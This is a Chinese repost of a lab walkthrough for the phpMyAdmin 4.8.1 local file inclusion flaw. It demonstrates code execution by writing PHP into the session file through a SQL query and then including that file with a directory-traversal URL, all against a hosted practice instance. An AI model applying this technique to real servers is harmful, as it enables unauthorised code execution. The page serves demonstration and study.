phpMyAdmin 4.8.x(最新版) 本地文件包含漏洞利用

本文转载自:phpMyAdmin 4.8.x LFI Exploit -http://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-LFI-Exploit/

今天ChaMd5安全团队公开了一个phpMyAdmin最新版中的本地文件包含漏洞:phpmyadmin4.8.1后台getshell。该漏洞利用不要求root帐号,只需能够登录 phpMyAdmin 便能够利用。

在这篇文章中我们将使用VulnSpy的在线 phpMyAdmin 环境来演示该漏洞的利用。

VulnSpy 在线 phpMyAdmin 环境地址:http://www.vulnspy.com/phpmyadmin-4.8.1/

漏洞细节

参照ChaMd5安全团队发布的文章:phpmyadmin4.8.1后台getshell

漏洞利用

因为原文中包含数据库文件可能由于文件权限或者帐号权限不足而无法利用,这里我们将使用另外一种方式来利用该文件包含漏洞,即包含session文件。

1. 进入VulnSpy 在线 phpMyAdmin 环境地址,点击 Start to Hack ,跳转到VSPlate

2. 等待载入设置后,点击 GO 按钮开启实验

3. 实验创建完成后,点击演示地址进入实验

4. 使用帐号 root ,密码 toor 登录 phpMyAdmin

5. 点击顶部导航栏中的SQL按钮,执行SQL查询

1

select '<?php phpinfo();exit;?>'

6. 获取自己的SESSION ID

你的 SESSION ID 为 Cookie 中的 phpMyAdmin 项。

这样对应的SESSION文件为/var/lib/php/sessions/sess_你的SESSION ID

7. 包含SESSION文件,成功利用该漏洞

1

http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k

原文链接:http://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-LFI-Exploit/

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏FreeBuf

Visual Basic GUI:一款在SSH客户端上注入击键的工具

今天给大家介绍的是一款注入工具,该工具名叫Visual Basic GUI,它可以通过X11转发会话来向SSH客户端注入击键数据。也就是说,这款工具可以利用X1...

1123
来自专栏LinXunFeng的专栏

PyCharm中设置python3解释器

1303
来自专栏沈唁志

在Windows下搭建Python3.6的运行环境

1835
来自专栏yukong的小专栏

easyUI自定义iconeasyUI自定义icon

首先我们需要下载好自己需要的标签并且放在一个文件中,然后把这个文件夹复制到easyui所在目录下的themes目录下 如图

573
来自专栏DeveWork

自定义WordPress 密码文章提示文字

WordPress 默认的密码提示文字是这样的:This post is password protected. To view it please enter...

2427
来自专栏Charlie's Road

Pycharm 项目运行错误问题整理

意思缺少 matplotlib库, 可以点击Python -> preference -> Project Interpreter

661
来自专栏xiaoxi666的专栏

MATLAB R2017a 进入主界面以后一直处于初始化状态的解决办法

自从前几天更新了win10系统,结果发现matlab不能用了,进入主界面一直初始化,没完没了。

902
来自专栏安恒信息

预警 | WordPress存在多个高危漏洞

CVE-2016-10033 PHPMailer命令执行漏,在WordPress 中的利用 CVE-2017-8295 WordPress密码重置漏洞 一、漏洞...

2756
来自专栏汇智网教程

Chrome本地安装Metamask

3287
来自专栏LeeCen

Swift Perfect - 使用 systemd 命令服务器项目后台运行

681

扫码关注云+社区